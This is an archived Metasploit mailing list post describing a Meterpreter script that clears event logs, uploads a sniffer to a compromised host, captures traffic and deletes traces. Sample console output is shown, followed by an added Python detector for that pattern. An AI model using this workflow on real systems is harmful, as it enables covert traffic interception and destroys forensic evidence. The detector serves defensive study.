Metasploit mailing list archives
Meterpreter tcpdump script
From: matteo.cantoni at gmail.com (Matteo Cantoni)
Date: Wed, 12 Nov 2008 22:14:11 +0100
Hi, ok ok I know this is a simple meterpreter script, but it seems to work and I wrote it drinking some beers in a pub :)

1) clears all the event logs (if log_clear is 1)
2) upload tcpdump.exe (compiled with Packet Sniffer SDK, WinPcap is not required) on target with random name
3) create a dump file with random name
4) kill sniffer's process on target
5) download dump file from target
6) remove sniffer and dump from target
7) clears all the event logs (if log_clear is 1)

    meterpreter > run tcpdump
    [*] Clearing the all events logs!
    [*] Uploading executable OROPJ.exe to target!
    [*] Sniffing for 600 seconds! (interface 2, dump file ZZTCN.pcap)
    [*] Killing off OROPJ.exe after 600 seconds (pid 744)
    [*] Downloading dump file ZZTCN.pcap...
    [*] Removing OROPJ.exe and ZZTCN.pcap!
    [*] Clearing the all events logs!
    [*] Done!
    meterpreter >

You could also add some tcpdump filters etc...

- http://www.nothink.org/metasploit/tcpdump.rb
- http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/PacketStuff-Network-Toolkit.shtml (tnx Thierry)

Matteo

Attachment: tcpdump.rb (application/x-ruby, 2376 bytes) <http://mail.metasploit.com/pipermail/framework/attachments/20081112/489d75fd/attachment.rb>
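From the defender's side, the seven steps above leave a recognisable trace on the host: an event-log clear, a randomly named executable (five uppercase letters, e.g. OROPJ.exe) started right after it, the same file deleted a few minutes later, and a second log clear. The following detector is an added example, not part of the original post or the script; it runs over constructed telemetry lines (timestamp, event name, detail) whose event names LOG_CLEARED, PROC_START, PROC_END and FILE_DELETE are assumptions standing in for the real sources (Security event 1102 / System event 104 for a cleared log, 4688 for process creation).

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not from the original post). The first six
# lines mirror the sequence the script produces; the last line is benign.
SAMPLE_LOG = """\
2008-11-12T21:55:00 LOG_CLEARED Security
2008-11-12T21:55:01 PROC_START C:\\WINDOWS\\Temp\\OROPJ.exe
2008-11-12T22:05:02 PROC_END C:\\WINDOWS\\Temp\\OROPJ.exe
2008-11-12T22:05:10 FILE_DELETE C:\\WINDOWS\\Temp\\OROPJ.exe
2008-11-12T22:05:10 FILE_DELETE C:\\WINDOWS\\Temp\\ZZTCN.pcap
2008-11-12T22:05:11 LOG_CLEARED Security
2008-11-12T23:00:00 PROC_START C:\\Program Files\\Wireshark\\dumpcap.exe
"""

# The script names its uploads with five random uppercase letters.
RANDOM_NAME = re.compile(r"[A-Z]{5}\.exe$")
WINDOW = timedelta(minutes=15)  # assumed gap between log clear and drop


def parse(text):
    """Split each telemetry line into (datetime, event name, detail)."""
    events = []
    for line in text.splitlines():
        ts, kind, detail = line.split(" ", 2)  # detail may contain spaces
        events.append((datetime.fromisoformat(ts), kind, detail))
    return events


def find_sniffer_drops(text, window=WINDOW):
    """Return paths of randomly named executables that were started within
    `window` after a log clear and later deleted (steps 1, 2 and 6)."""
    events = parse(text)
    clears = [ts for ts, kind, _ in events if kind == "LOG_CLEARED"]
    deleted = {detail for _, kind, detail in events if kind == "FILE_DELETE"}
    hits = []
    for ts, kind, detail in events:
        if kind != "PROC_START" or not RANDOM_NAME.search(detail):
            continue
        after_clear = any(timedelta(0) <= ts - c <= window for c in clears)
        if after_clear and detail in deleted:
            hits.append(detail)
    return hits


if __name__ == "__main__":
    print(find_sniffer_drops(SAMPLE_LOG))  # → ['C:\\WINDOWS\\Temp\\OROPJ.exe']
```

The clear-then-drop ordering is what separates this from a legitimate capture tool such as dumpcap.exe, which matches neither the naming pattern nor the log-clear precondition.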
Current thread:
- Meterpreter tcpdump script Matteo Cantoni (Nov 12)
- Meterpreter tcpdump script Matteo Cantoni (Nov 13)
- Meterpreter tcpdump script Jun Koi (Nov 13)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Thierry Zoller (Nov 14)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Jerome Athias (Nov 14)
- Meterpreter tcpdump script Jun Koi (Nov 16)